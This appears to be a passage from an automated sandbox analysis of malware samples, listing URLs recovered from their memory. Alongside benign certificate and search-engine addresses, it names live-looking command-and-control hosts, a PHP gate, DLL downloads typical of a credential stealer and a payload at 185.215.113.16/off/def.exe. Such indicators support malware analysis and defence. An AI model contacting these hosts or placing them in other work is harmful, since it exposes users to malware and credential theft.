Source: 06d4af6f50.exe, 0000001A.00000003.3773018531.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3797225611.00000000006DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: file.exe, 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2672659024.0000000000E35000.00000040.00000001.01000000.00000003.sdmp, deb333ea90.exe, 0000001B.00000002.3502627065.000000000138E000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/5
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll=j
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll3k
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dlla
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllUk
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllgk
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllp
Source: file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2675026709.00000000015B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/EU
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/K
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/LMEM00
Source: deb333ea90.exe, 00000020.00000002.3673961826.000000000102F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/_
Source: deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php0%
Source: deb333ea90.exe, 0000001B.00000002.3502627065.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php0c
Source: file.exe, 00000000.00000002.2675026709.00000000015B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6K
Source: file.exe, 00000000.00000002.2675026709.0000000001583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpB;
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpY
Source: file.exe, 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: file.exe, 00000000.00000002.2672659024.0000000000E35000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/d
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/j
Source: deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/w
Source: deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206K
Source: file.exe, 00000000.00000002.2672659024.0000000000E35000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206lfons
Source: file.exe, 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206n
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000003.3926107779.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php)
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php)N
Source: skotes.exe, 00000016.00000003.3926107779.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2001
Source: skotes.exe, 00000016.00000003.3926107779.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php42001
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;
Source: skotes.exe, 00000016.00000003.3926107779.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpQ
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedj
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce9040001
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 06d4af6f50.exe, 0000001E.00000003.3698858088.00000000017F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: 06d4af6f50.exe, 0000001A.00000003.3430761096.0000000000683000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro(
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 06d4af6f50.exe, 0000001E.00000002.3904549769.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.miO
Source: 06d4af6f50.exe, 0000001E.00000002.3904549769.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000018.00000002.3439711369.00000287D1975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3414689340.00000287C30A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000018.00000002.3414689340.00000287C301D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000018.00000002.3414689340.00000287C17C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.3414689340.00000287C2E77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000018.00000002.3414689340.00000287C301D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, 00000000.00000002.2700275828.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2699438773.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000002.2675026709.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000018.00000002.3414689340.00000287C17C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3809548607.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3809548607.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2675026709.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2675026709.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ce1867e0-c703-4933-b520-1e055912c849.tmp.38.dr, e65607d6-3a92-4f2e-9d6f-37eaf17ba295.tmp.38.dr	String found in binary or memory: https://clients2.google.com
Source: ce1867e0-c703-4933-b520-1e055912c849.tmp.38.dr, e65607d6-3a92-4f2e-9d6f-37eaf17ba295.tmp.38.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3809548607.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
